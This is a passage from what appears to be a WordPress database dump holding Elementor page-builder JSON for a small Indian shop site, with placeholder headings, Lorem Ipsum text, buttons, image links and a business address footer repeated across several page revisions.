here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8203,1447,'_elementor_page_assets','a:0:{}'),(8205,1448,'_elementor_edit_mode','builder'),(8206,1448,'_elementor_template_type','wp-page'),(8207,1448,'_elementor_version','3.7.7'),(8208,1448,'_wp_page_template','elementor_canvas'),(8209,1448,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8210,1448,'_elementor_page_assets','a:0:{}'),(8213,1449,'_elementor_edit_mode','builder'),(8214,1449,'_elementor_template_type','wp-page'),(8215,1449,'_elementor_version','3.7.7'),(8216,1449,'_wp_page_template','elementor_canvas'),(8217,1449,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\"